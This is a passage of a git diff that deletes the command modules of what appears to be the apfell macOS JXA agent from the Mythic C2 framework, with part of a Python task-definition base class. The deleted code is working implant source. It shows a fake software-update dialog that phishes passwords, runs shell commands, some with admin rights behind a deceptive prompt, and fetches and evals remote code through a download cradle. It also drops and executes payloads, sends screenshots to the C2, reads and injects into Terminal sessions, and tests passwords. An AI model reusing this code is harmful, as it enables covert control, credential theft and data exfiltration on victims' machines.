error.toString(), "completed": true, "status": "error"}; - } - } - else if(config['type'] === "readLaunchDaemons"){ - let fileManager = $.NSFileManager.defaultManager; - let path = "/Library/LaunchDaemons/"; - let error = Ref(); - output = {}; - let files = fileManager.contentsOfDirectoryAtPathError($(path), error); - try{ - // no errors, so now iterate over the files - files = ObjC.deepUnwrap(files); - output["systemLaunchDaemons"] = {}; - for(let i in files){ - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(path + files[i]); - let contents = ObjC.deepUnwrap(prefs); - if(contents === undefined){ contents = {};} - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + files[i]), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output['systemLaunchDaemons'][files[i]] = {}; - output["systemLaunchDaemons"][files[i]]['contents'] = contents; - if(contents !== undefined && contents.hasOwnProperty('ProgramArguments')){ - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(contents['ProgramArguments'][0]), $())); - if(attributes !== undefined){ - let trimmed_attributes = {}; - trimmed_attributes['NSFileOwnerAccountID'] = attributes['NSFileOwnerAccountID']; - trimmed_attributes['NSFileExtensionHidden'] = attributes['NSFileExtensionHidden']; - trimmed_attributes['NSFileGroupOwnerAccountID'] = attributes['NSFileGroupOwnerAccountID']; - trimmed_attributes['NSFileOwnerAccountName'] = attributes['NSFileOwnerAccountName']; - trimmed_attributes['NSFileCreationDate'] = attributes['NSFileCreationDate']; - nsposix = attributes['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - trimmed_attributes['NSFilePosixPermissions'] = posix; - trimmed_attributes['NSFileGroupOwnerAccountName'] = attributes['NSFileGroupOwnerAccountName']; - trimmed_attributes['NSFileModificationDate'] = attributes['NSFileModificationDate']; - output["systemLaunchDaemons"][files[i]]['ProgramAttributes'] = trimmed_attributes; - } - } - } - } - catch(error){ - return {"user_output":"Failed to read launch daemons: " + error.toString(), "completed": true, "status": "error"}; - } - } - return {"user_output":JSON.stringify(output, null, 2), "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; - diff --git a/Payload_Types/apfell/agent_code/prompt.js b/Payload_Types/apfell/agent_code/prompt.js deleted file mode 100755 index c749a5e57..000000000 --- a/Payload_Types/apfell/agent_code/prompt.js +++ /dev/null @@ -1,27 +0,0 @@ -exports.prompt = function(task, command, params){ - let config = []; - if(params.length > 0){config = JSON.parse(params);} - else{config = [];} - let title = "Application Needs to Update"; - if(config.hasOwnProperty("title") && config['title'] !== ""){title = config['title'];} - let icon = "/System/Library/PreferencePanes/SoftwareUpdate.prefPane/Contents/Resources/SoftwareUpdate.icns"; - if(config.hasOwnProperty("icon") && config['icon'] !== ""){icon = config['icon'];} - let text = "An application needs permission to update"; - if(config.hasOwnProperty("text") && config['text'] !== ""){text = config['text'];} - let answer = ""; - if(config.hasOwnProperty("answer") && config['answer'] !== ""){answer = config['answer'];} - try{ - let prompt = currentApp.displayDialog(text, { - defaultAnswer: answer, - buttons: ['OK', 'Cancel'], - defaultButton: 'OK', - cancelButton: 'Cancel', - withTitle: title, - withIcon: Path(icon), - hiddenAnswer: true - }); - return {"user_output":prompt.textReturned, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/pwd.js b/Payload_Types/apfell/agent_code/pwd.js deleted file mode 100755 index b6fc60afb..000000000 --- a/Payload_Types/apfell/agent_code/pwd.js +++ /dev/null @@ -1,12 +0,0 @@ -exports.pwd = function(task, command, params){ - try{ - let fileManager = $.NSFileManager.defaultManager; - let cwd = fileManager.currentDirectoryPath; - if(cwd === undefined || cwd === ""){ - return {"user_output":"CWD is empty or undefined", "completed": true, "status": "error"}; - } - return {"user_output":cwd.js, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/report_routes.js b/Payload_Types/apfell/agent_code/report_routes.js deleted file mode 100644 index 2b53669fb..000000000 --- a/Payload_Types/apfell/agent_code/report_routes.js +++ /dev/null @@ -1,14 +0,0 @@ -exports.report_routes = function(task, command, params){ - let parameters = JSON.parse(params); - let edges = [ - { - "source": parameters['source'], - "destination": parameters['destination'], - "direction": parameters['direction'], - "action": parameters['action'], - "metadata": parameters['metadata'] - } - ]; - //C2.htmlPostData("api/v1.4/agent_message", data, apfell.id); - return {"user_output": "Route submitted", "completed": true, "edges": edges}; -}; diff --git a/Payload_Types/apfell/agent_code/rm.js b/Payload_Types/apfell/agent_code/rm.js deleted file mode 100755 index 84c928040..000000000 --- a/Payload_Types/apfell/agent_code/rm.js +++ /dev/null @@ -1,15 +0,0 @@ -exports.rm = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - let path = command_params['path']; - let fileManager = $.NSFileManager.defaultManager; - if(path[0] === '"'){ - path = path.substring(1, path.length-1); - } - let error = Ref(); - fileManager.removeItemAtPathError($(path), error); - return {"user_output":"Removed file", "completed": true, "removed_files": [{"path": path, "host": ""}]}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/run.js b/Payload_Types/apfell/agent_code/run.js deleted file mode 100755 index 7c09941be..000000000 --- a/Payload_Types/apfell/agent_code/run.js +++ /dev/null @@ -1,33 +0,0 @@ -exports.run = function(task, command, params){ - //launch a program and args via ObjC bridge without doShellScript and return response - let response = ""; - try{ - let pieces = JSON.parse(params); - let path = pieces['path']; - //console.log(path); - let args = pieces['args']; - let pipe = $.NSPipe.pipe; - let file = pipe.fileHandleForReading; // NSFileHandle - let task = $.NSTask.alloc.init; - task.launchPath = path; //'/bin/ps' - task.arguments = args; //['ax'] - task.standardOutput = pipe; // if not specified, literally writes to file handles 1 and 2 - task.standardError = pipe; - //console.log("about to launch"); - task.launch; // Run the command 'ps ax' - //console.log("launched"); - if(args[args.length - 1] !== "&"){ - //if we aren't tasking this to run in the background, then try to read the output from the program - // this will hang our main program though for now - let data = file.readDataToEndOfFile; // NSData, potential to hang here? - file.closeFile; - response = $.NSString.alloc.initWithDataEncoding(data, $.NSUTF8StringEncoding).js; - } - else{ - response = "launched program"; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - return {"user_output":response, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/screenshot.js b/Payload_Types/apfell/agent_code/screenshot.js deleted file mode 100755 index 450fed596..000000000 --- a/Payload_Types/apfell/agent_code/screenshot.js +++ /dev/null @@ -1,45 +0,0 @@ -exports.screenshot = function(task, command, params){ - try{ - ObjC.import('Cocoa'); - ObjC.import('AppKit'); - let cgimage = $.CGDisplayCreateImage($.CGMainDisplayID()); - if(cgimage.js === undefined) { - cgimage = $.CFMakeCollectable(cgimage); // in case 10.15 is messing with the types again - } - if(cgimage.js === undefined){ - return {"user_output":"Failed to get image from display", "completed": true, "status": "error"}; - } - let bitmapimagerep = $.NSBitmapImageRep.alloc.initWithCGImage(cgimage); - let capture = bitmapimagerep.representationUsingTypeProperties($.NSBitmapImageFileTypePNG, Ref()); - let offset = 0; - let chunkSize = 350000; - let fileSize = parseInt(capture.length); - // always round up to account for chunks that are < chunksize; - let numOfChunks = Math.ceil(fileSize / chunkSize); - let registerData = {'total_chunks': numOfChunks, 'task': task.id}; - let registerFile = C2.postResponse(task, registerData); - if (registerFile['responses'][0]['status'] === "success"){ - let currentChunk = 1; - let csize = capture.length - offset > chunkSize ? chunkSize : capture.length - offset; - let data = capture.subdataWithRange($.NSMakeRange(offset, csize)); - while(parseInt(data.length) > 0 && offset < fileSize){ - // send a chunk - let fileData = {'chunk_num': currentChunk, 'chunk_data': data.base64EncodedStringWithOptions(0).js, 'task': task.id, 'file_id': registerFile['responses'][0]['file_id']}; - C2.postResponse(task, fileData); - $.NSThread.sleepForTimeInterval(C2.gen_sleep_time()); - - // increment the offset and seek to the amount of data read from the file - offset = offset + parseInt(data.length); - csize = capture.length - offset > chunkSize ? chunkSize : capture.length - offset; - data = capture.subdataWithRange($.NSMakeRange(offset, csize)); - currentChunk += 1; - } - return {"user_output":JSON.stringify({"file_id": registerFile['responses'][0]['file_id']}), "completed": true}; - } - else{ - return {"user_output":"Failed to register file to download", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":"Failed to get a screencapture: " + error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/security_info.js b/Payload_Types/apfell/agent_code/security_info.js deleted file mode 100755 index 53fbbbbe9..000000000 --- a/Payload_Types/apfell/agent_code/security_info.js +++ /dev/null @@ -1,14 +0,0 @@ -exports.security_info = function(task, command, params){ - try{ - let secObj = Application("System Events").securityPreferences(); - let info = "automaticLogin: " + secObj.automaticLogin() + - "\nlogOutWhenInactive: " + secObj.logOutWhenInactive() + - "\nlogOutWhenInactiveInterval: " + secObj.logOutWhenInactiveInterval() + - "\nrequirePasswordToUnlock: " + secObj.requirePasswordToUnlock() + - "\nrequirePasswordToWake: " + secObj.requirePasswordToWake(); - //"\nsecureVirtualMemory: " + secObj.secureVirtualMemory(); //might need to be in an elevated context - return {"user_output":info, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/shell.js b/Payload_Types/apfell/agent_code/shell.js deleted file mode 100755 index 4bacb33cd..000000000 --- a/Payload_Types/apfell/agent_code/shell.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.shell = function(task, command, params){ - //simply run a shell command via doShellScript and return the response - let response = ""; - try{ - let command_params = JSON.parse(params); - let command = command_params['command']; - if(command[command.length-1] === "&"){ - //doShellScript actually does macOS' /bin/sh which is actually bash emulating sh - // so to actually background a task, you need "&> /dev/null &" at the end - // so I'll just automatically fix this so it's not weird for the operator - command = command + "> /dev/null &"; - } - response = currentApp.doShellScript(command); - if(response === undefined || response === ""){ - response = "No Command Output"; - } - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = response.replace(/\r/g, "\n"); - return {"user_output":response, "completed": true}; - } - catch(error){ - response = error.toString().replace(/\r/g, "\n"); - return {"user_output":response, "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/shell_elevated.js b/Payload_Types/apfell/agent_code/shell_elevated.js deleted file mode 100755 index 706e63d2f..000000000 --- a/Payload_Types/apfell/agent_code/shell_elevated.js +++ /dev/null @@ -1,52 +0,0 @@ -exports.shell_elevated = function(task, command, params){ - try{ - let response = ""; - let pieces = []; - let cmd = ""; - if(params.length > 0){ pieces = JSON.parse(params); } - else{ pieces = []; } - if(pieces.hasOwnProperty('command') && pieces['command'] !== ""){ - if(pieces['command'][command.length -1] === "&"){ - cmd = pieces['command'] + "> /dev/null &"; - }else{ - cmd = pieces['command']; - } - } - else{ - return {"user_output": "missing command", "completed": true, "status": "error"}; - } - let use_creds = false; - let prompt = "An application needs permission to update"; - if(pieces.hasOwnProperty('use_creds') && typeof pieces['use_creds'] === "boolean"){ use_creds = pieces['use_creds'];} - if(!use_creds){ - if(pieces.hasOwnProperty('prompt') && pieces['prompt'] !== ""){ prompt = pieces['prompt'];} - try{ - response = currentApp.doShellScript(cmd, {administratorPrivileges:true,withPrompt:prompt}); - } - catch(error){ - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = error.toString().replace(/\r/g, "\n"); - return {"user_output":response, "completed": true, "status": "error"}; - } - } - else{ - let userName = apfell.user; - let password = ""; - if(pieces.hasOwnProperty('user') && pieces['user'] !== ""){ userName = pieces['user']; } - if(pieces.hasOwnProperty('credential')){ password = pieces['credential']; } - try{ - response = currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:userName, password:password}); - } - catch(error){ - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = error.toString().replace(/\r/g, "\n"); - return {"user_output":response, "completed": true, "status": "error"}; - } - } - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = response.replace(/\r/g, "\n"); - return {"user_output":response, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/sleep.js b/Payload_Types/apfell/agent_code/sleep.js deleted file mode 100755 index e9b2fa780..000000000 --- a/Payload_Types/apfell/agent_code/sleep.js +++ /dev/null @@ -1,15 +0,0 @@ -exports.sleep = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(command_params.hasOwnProperty('interval') && command_params['interval'] >= 0){ - C2.interval = command_params['interval']; - } - if(command_params.hasOwnProperty('jitter') && command_params['jitter'] >= 0 && command_params['jitter'] <= 100){ - C2.jitter = command_params['jitter']; - } - return {"user_output":"Sleep interval updated to " + C2.interval + " and sleep jitter updated to " + C2.jitter, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; - diff --git a/Payload_Types/apfell/agent_code/socks.js b/Payload_Types/apfell/agent_code/socks.js deleted file mode 100644 index 1887764e7..000000000 --- a/Payload_Types/apfell/agent_code/socks.js +++ /dev/null @@ -1,13 +0,0 @@ -exports.socks = function(task, command, params){ - let parameters = JSON.parse(params); - let data = {"socks": {} }; - if(parameters['action'] === 'start'){ - data['socks'] = {"start": parameters['port']} ; - }else{ - data['socks'] = {"stop": parameters['port']} ; - } - let resp = C2.postResponse(task, data); - return {"user_output": JSON.stringify(resp), "completed": true}; -}; - - \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/socks_send.js b/Payload_Types/apfell/agent_code/socks_send.js deleted file mode 100644 index 78a28e879..000000000 --- a/Payload_Types/apfell/agent_code/socks_send.js +++ /dev/null @@ -1,7 +0,0 @@ -exports.socks_send = function(task, command, params){ - //let parameters = JSON.parse(params); - let data = {"socks": {} }; - data['socks']['data'] = [{"server_id": 34567, "data": ""}]; - let resp = C2.postResponse(task, data); - return {"user_output": JSON.stringify(resp), "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/spawn_download_cradle.js b/Payload_Types/apfell/agent_code/spawn_download_cradle.js deleted file mode 100755 index ec22dd6b7..000000000 --- a/Payload_Types/apfell/agent_code/spawn_download_cradle.js +++ /dev/null @@ -1,29 +0,0 @@ -exports.spawn_download_cradle = function(task, command, params){ - try{ - let config = JSON.parse(params); - if(!config.hasOwnProperty('url')){return {"user_output": "missing url parameter: 'a URL address where the jxa code is hosted'", "completed": true, "status": "error"};} - let full_url = config['url']; - let path = "/usr/bin/osascript"; - let args = ['-l','JavaScript','-e']; - let command = "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString("; - command = command + "'" + full_url + "')),$.NSUTF8StringEncoding)));"; - args.push(command); - args.push("&"); - try{ - let pipe = $.NSPipe.pipe; - let file = pipe.fileHandleForReading; // NSFileHandle - let task = $.NSTask.alloc.init; - task.launchPath = path; - task.arguments = args; - task.standardOutput = pipe; - task.standardError = pipe; - task.launch; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - return {"user_output":"Process spawned", "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/spawn_drop_and_execute.js b/Payload_Types/apfell/agent_code/spawn_drop_and_execute.js deleted file mode 100755 index 961e2f27e..000000000 --- a/Payload_Types/apfell/agent_code/spawn_drop_and_execute.js +++ /dev/null @@ -1,39 +0,0 @@ -exports.spawn_drop_and_execute = function(task, command, params){ - let artifacts = []; - try{ - let config = JSON.parse(params); - //full_url = C2.baseurl + "api/v1.0/payloads/get/" + split_params[3]; - let m = [...Array(Number(10))].map(i=>(~~(Math.random()*36)).toString(36)).join(''); - let temp_file = "/tmp/" + m; - let file = C2.upload(task, config['template'], temp_file); - - let path = "/usr/bin/osascript"; - let result = write_data_to_file(file, temp_file); - if(result !== "file written"){return {"user_output": result, "completed": true, "status": 'error'};} - else{artifacts.push({"base_artifact": "File Create", "artifact": temp_file});} - let args = ['-l','JavaScript', temp_file, '&']; - try{ - let pipe = $.NSPipe.pipe; - let file = pipe.fileHandleForReading; // NSFileHandle - let task = $.NSTask.alloc.init; - task.launchPath = path; - task.arguments = args; - task.standardOutput = pipe; - task.standardError = pipe; - task.launch; - artifacts.push({"base_artifact": "Process Create", "artifact": "/usr/bin/osascript " + args.join(" ")}); - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error", "artifacts": artifacts}; - } - //give the system time to actually execute the file before we delete it - $.NSThread.sleepForTimeInterval(3); - let fileManager = $.NSFileManager.defaultManager; - fileManager.removeItemAtPathError($(temp_file), $()); - return {"user_output": "Created temp file: " + temp_file + ", started process and removed file", "completed": true, "artifacts": artifacts}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error", "artifacts": artifacts}; - } -}; - - \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/system_info.js b/Payload_Types/apfell/agent_code/system_info.js deleted file mode 100755 index 4c1264adf..000000000 --- a/Payload_Types/apfell/agent_code/system_info.js +++ /dev/null @@ -1,7 +0,0 @@ -exports.system_info = function(task, command, params){ - try{ - return {"user_output":JSON.stringify(currentApp.systemInfo(), null, 2), "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/terminals_read.js b/Payload_Types/apfell/agent_code/terminals_read.js deleted file mode 100755 index f8382c7d5..000000000 --- a/Payload_Types/apfell/agent_code/terminals_read.js +++ /dev/null @@ -1,54 +0,0 @@ -exports.terminals_read = function(task, command, params){ - let split_params = {}; - try{ - split_params = JSON.parse(params); - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - let all_data = {}; - try{ - let term = Application("Terminal"); - if(term.running()){ - let windows = term.windows; - for(let i = 0; i < windows.length; i++){ - let win_info = { - "Name": windows[i].name(), - "Visible": windows[i].visible(), - "Frontmost": windows[i].frontmost(), - "tabs": [] - }; - let all_tabs = []; - // store the windows information in id_win in all_data - all_data["window_" + i] = win_info; - for(let j = 0; j < windows[i].tabs.length; j++){ - let tab_info = { - "tab": j, - "Busy": windows[i].tabs[j].busy(), - "Processes": windows[i].tabs[j].processes(), - "Selected": windows[i].tabs[j].selected(), - "TTY": windows[i].tabs[j].tty() - }; - if(windows[i].tabs[j].titleDisplaysCustomTitle()){ - tab_info["CustomTitle"] = windows[i].tabs[j].customTitle(); - } - if(split_params['level'] === 'history'){ - tab_info["History"] = windows[i].tabs[j].history(); - } - if(split_params['level'] === 'contents'){ - tab_info["Contents"] = windows[i].tabs[j].contents(); - } - all_tabs.push(tab_info); - } - // store all of the tab information corresponding to that window id at id_tabs - win_info['tabs'] = all_tabs; - } - }else{ - return {"user_output":"Terminal is not running", "completed": true, "status": "error"}; - } - - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - let output = JSON.stringify(all_data, null, 2); - return {"user_output":output, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/terminals_send.js b/Payload_Types/apfell/agent_code/terminals_send.js deleted file mode 100755 index 3788e914b..000000000 --- a/Payload_Types/apfell/agent_code/terminals_send.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.terminals_send = function(task, command, params){ - let split_params = {"window": 0, "tab": 0, "command": ""}; - try{ - split_params = Object.assign({}, split_params, JSON.parse(params)); - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - let output = "No Command Output"; - try{ - let term = Application("Terminal"); - if(term.running()){ - let window = split_params['window']; - let tab = split_params['tab']; - let cmd = split_params['command']; - term.doScript(cmd, {in:term.windows[window].tabs[tab]}); - output = term.windows[window].tabs[tab].contents(); - }else{ - return {"user_output":"Terminal is not running", "completed": true, "status": "error"}; - } - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - return {"user_output":output, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/test_password.js b/Payload_Types/apfell/agent_code/test_password.js deleted file mode 100755 index 2c0e48255..000000000 --- a/Payload_Types/apfell/agent_code/test_password.js +++ /dev/null @@ -1,31 +0,0 @@ -exports.test_password = function(task, command, params){ - ObjC.import("OpenDirectory"); - let session = $.ODSession.defaultSession; - let sessionType = 0x2201 // $.kODNodeTypeAuthentication - let recType = $.kODRecordTypeUsers - let node = $.ODNode.nodeWithSessionTypeError(session, sessionType, $()); - let username = apfell.user; - let password = ""; - if(params.length > 0){ - let data = JSON.parse(params); - if(data.hasOwnProperty('username') && data['username'] !== ""){ - username = data['username']; - } - if(data.hasOwnProperty('password') && data['password'] !== ""){ - password = data['password']; - } - // if no password is supplied, try an empty password - } - let user = node.recordWithRecordTypeNameAttributesError(recType,$(username), $(), $()) - if(user.js !== undefined){ - if(user.verifyPasswordError($(password),$())){ - return {"user_output":"Successful authentication", "completed": true}; - } - else{ - return {"user_output":"Failed authentication", "completed": true}; - } - } - else{ - return {"user_output":"User does not exist", "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/upload.js b/Payload_Types/apfell/agent_code/upload.js deleted file mode 100755 index 31af6541a..000000000 --- a/Payload_Types/apfell/agent_code/upload.js +++ /dev/null @@ -1,32 +0,0 @@ -exports.upload = function(task, command, params){ - try{ - let config = JSON.parse(params); - let full_path = config['remote_path']; - let data = "Can't find 'file' or 'file_id' with non-blank values"; - let file_id = ""; - if(config.hasOwnProperty('file') && config['file'] !== ""){ - data = C2.upload(task, config['file'], ""); - file_id = config['file'] - } - if(typeof data === "string"){ - return {"user_output":String(data), "completed": true, "status": "error"}; - } - else{ - data = write_data_to_file(data, full_path); - try{ - let fm = $.NSFileManager.defaultManager; - let pieces = ObjC.deepUnwrap(fm.componentsToDisplayForPath(full_path)); - if(pieces === undefined){ - return {'status': 'error', 'user_output': String(data), 'completed': true}; - } - full_path = "/" + pieces.slice(1).join("/"); - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), 'completed': true}; - } - return {"user_output":String(data), "completed": true, 'full_path': full_path, "file_id": file_id, - "artifacts": [{"base_artifact": "File Create", "artifact": full_path}]}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/mythic/CommandBase.py b/Payload_Types/apfell/mythic/CommandBase.py deleted file mode 100644 index 6e949deb3..000000000 --- a/Payload_Types/apfell/mythic/CommandBase.py +++ /dev/null @@ -1,483 +0,0 @@ -from abc import abstractmethod, ABCMeta -import json -from enum import Enum -import base64 -import uuid -from pathlib import Path - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - Completed = "completed" - Processed = "processed" - Processing = "processing" - - -class ParameterType(Enum): - String = "String" - Boolean = "Boolean" - File = "File" - Array = "Array" - ChooseOne = "Choice" - ChooseMultiple = "ChoiceMultiple" - Credential_JSON = "Credential-JSON" - Credential_Account = "Credential-Account" - Credential_Realm = "Credential-Realm" - Credential_Type = ("Credential-Type",) - Credential_Value = "Credential-Credential" - Number = "Number" - Payload = "PayloadList" - ConnectionInfo = "AgentConnect" - - -class CommandParameter: - def __init__( - self, - name: str, - type: ParameterType, - description: str = "", - choices: [any] = None, - required: bool = True, - default_value: any = None, - validation_func: callable = None, - value: any = None, - supported_agents: [str] = None, - ): - self.name = name - self.type = type - self.description = description - if choices is None: - self.choices = [] - else: - self.choices = choices - self.required = required - self.validation_func = validation_func - if value is None: - self.value = default_value - else: - self.value = value - self.default_value = default_value - self.supported_agents = supported_agents if supported_agents is not None else [] - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def type(self): - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def choices(self): - return self._choices - - @choices.setter - def choices(self, choices): - self._choices = choices - - @property - def validation_func(self): - return self._validation_func - - @validation_func.setter - def validation_func(self, validation_func): - self._validation_func = validation_func - - @property - def supported_agents(self): - return self._supported_agents - - @supported_agents.setter - def supported_agents(self, supported_agents): - self._supported_agents = supported_agents - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is not None: - type_validated = TypeValidators().validate(self.type, value) - if self.validation_func is not None: - try: - self.validation_func(type_validated) - self._value = type_validated - except Exception as e: - raise ValueError( - "Failed validation check for parameter {} with value {}".format( - self.name, str(value) - ) - ) - return - else: - # now we do some verification ourselves based on the type - self._value = type_validated - return - self._value = value - - def to_json(self): - return { - "name": self._name, - "type": self._type.value, - "description": self._description, - "choices": "\n".join(self._choices), - "required": self._required, - "default_value": self._value, - "supported_agents": "\n".join(self._supported_agents), - } - - -class TypeValidators: - def validateString(self, val): - return str(val) - - def validateNumber(self, val): - try: - return int(val) - except: - return float(val) - - def validateBoolean(self, val): - if isinstance(val, bool): - return val - else: - raise ValueError("Value isn't bool") - - def validateFile(self, val): - try: # check if the file is actually a file-id - uuid_obj = uuid.UUID(val, version=4) - return str(uuid_obj) - except ValueError: - pass - return base64.b64decode(val) - - def validateArray(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("value isn't array") - - def validateCredentialJSON(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("value ins't a dictionary") - - def validatePass(self, val): - return val - - def validateChooseMultiple(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("Choices aren't in a list") - - def validatePayloadList(self, val): - return str(uuid.UUID(val, version=4)) - - def validateAgentConnect(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("Not instance of dictionary") - - switch = { - "String": validateString, - "Number": validateNumber, - "Boolean": validateBoolean, - "File": validateFile, - "Array": validateArray, - "Credential-JSON": validateCredentialJSON, - "Credential-Account": validatePass, - "Credential-Realm": validatePass, - "Credential-Type": validatePass, - "Credential-Credential": validatePass, - "Choice": validatePass, - "ChoiceMultiple": validateChooseMultiple, - "PayloadList": validatePayloadList, - "AgentConnect": validateAgentConnect, - } - - def validate(self, type: ParameterType, val: any): - return self.switch[type.value](self, val) - - -class TaskArguments(metaclass=ABCMeta): - def __init__(self, command_line: str): - self.command_line = str(command_line) - - @property - def args(self): - return self._args - - @args.setter - def args(self, args): - self._args = args - - def get_arg(self, key: str): - if key in self.args: - return self.args[key].value - else: - return None - - def has_arg(self, key: str) -> bool: - return key in self.args - - def get_commandline(self) -> str: - return self.command_line - - def is_empty(self) -> bool: - return len(self.args) == 0 - - def add_arg(self, key: str, value, type: ParameterType = None): - if key in self.args: - self.args[key].value = value - else: - if type is None: - self.args[key] = CommandParameter( - name=key, type=ParameterType.String, value=value - ) - else: - self.args[key] = CommandParameter(name=key, type=type, value=value) - - def rename_arg(self, old_key: str, new_key: str): - if old_key not in self.args: - raise Exception("{} not a valid parameter".format(old_key)) - self.args[new_key] = self.args.pop(old_key) - - def remove_arg(self, key: str): - self.args.pop(key, None) - - def to_json(self): - temp = [] - for k, v in self.args.items(): - temp.append(v.to_json()) - return temp - - def load_args_from_json_string(self, command_line: str): - temp_dict = json.loads(command_line) - for k, v in temp_dict.items(): - for k2,v2 in self.args.items(): - if v2.name == k: - v2.value = v - - async def verify_required_args_have_values(self): - for k, v in self.args.items(): - if v.value is None: - v.value = v.default_value - if v.required and v.value is None: - raise ValueError("Required arg {} has no value".format(k)) - - def __str__(self): - if len(self.args) > 0: - temp = {} - for k, v in self.args.items(): - if isinstance(v.value, bytes): - temp[k] = base64.b64encode(v.value).decode() - else: - temp[k] = v.value - return json.dumps(temp) - else: - return self.command_line - - @abstractmethod - async def parse_arguments(self): - pass - - -class AgentResponse: - def __init__(self, response: dict): - self.response = response - - -class Callback: - def __init__(self, **kwargs): - self.__dict__.update(kwargs) - - -class BrowserScript: - # if a browserscript is specified as part of a PayloadType, then it's a support script - # if a browserscript is specified as part of a command, then it's for that command - def __init__(self, script_name: str, author: str = None): - self.script_name = script_name - self.author = author - - def to_json(self, base_path: Path): - try: - code_file = ( - base_path - / "mythic" - / "browser_scripts" - / "{}.js".format(self.script_name) - ) - if code_file.exists(): - code = code_file.read_bytes() - code = base64.b64encode(code).decode() - else: - code = "" - return {"script": code, "name": self.script_name, "author": self.author} - except Exception as e: - return {"script": str(e), "name": self.script_name, "author": self.author} - - -class MythicTask: - def __init__( - self, taskinfo: dict, args: TaskArguments, status: MythicStatus = None - ): - self.task_id = taskinfo["id"] - self.original_params = taskinfo["original_params"] - self.completed = taskinfo["completed"] - self.callback = Callback(**taskinfo["callback"]) - self.agent_task_id = taskinfo["agent_task_id"] - self.operator = taskinfo["operator"] - self.args = args - self.status = MythicStatus.Success - if status is not None: - self.status = status - - def get_status(self) -> MythicStatus: - return self.status - - def set_status(self, status: MythicStatus): - self.status = status - - def __str__(self): - return str(self.args) - - -class CommandBase(metaclass=ABCMeta): - def __init__(self, agent_code_path: Path): - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - - @property - @abstractmethod - def cmd(self): - pass - - @property - @abstractmethod - def needs_admin(self): - pass - - @property - @abstractmethod - def help_cmd(self): - pass - - @property - 